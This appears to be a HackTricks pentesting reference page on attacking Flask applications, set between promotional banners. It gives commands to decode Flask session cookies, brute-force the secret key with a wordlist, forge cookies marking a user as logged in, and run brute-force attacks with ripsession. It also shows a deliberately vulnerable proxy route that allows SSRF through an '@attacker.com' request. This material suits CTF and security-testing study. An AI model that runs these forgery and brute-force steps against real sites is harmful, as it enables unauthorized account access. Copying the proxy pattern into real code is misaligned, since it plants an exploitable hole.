5.5 KiB
Flask
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Probably if you are playing a CTF a Flask application will be related to SSTI.
Cookies
Default cookie session name is session
.
Decoder
Online Flask coockies decoder: https://www.kirsle.net/wizards/flask-session.cgi
Manual
Get the first part of the cookie until the first point and Base64 decode it>
echo "ImhlbGxvIg" | base64 -d
The cookie is also signed using a password
Flask-Unsign
Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
{% embed url="https://pypi.org/project/flask-unsign/" %}
pip3 install flask-unsign
Decode Cookie
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
Brute Force
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
Signing
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
Signing using legacy (old versions)
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
RIPsession
Command line tool to brute-force websites using cookies crafted with flask-unsign.
{% embed url="https://github.com/Tagvi/ripsession" %}
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
SQLi in Flask session cookie with SQLmap
This example uses sqlmap eval
option to automatically sign sqlmap payloads for flask using a known secret.
Flask Proxy to SSRF
In this writeup it's explained how Flask allows a request starting with the charcter "@":
GET @/ HTTP/1.1
Host: target.com
Connection: close
Which in the following scenario:
from flask import Flask
from requests import get
app = Flask('__main__')
SITE_NAME = 'https://google.com/'
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content
app.run(host='0.0.0.0', port=8080)
Could allow to introduce something like "@attacker.com" in order to cause a SSRF.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.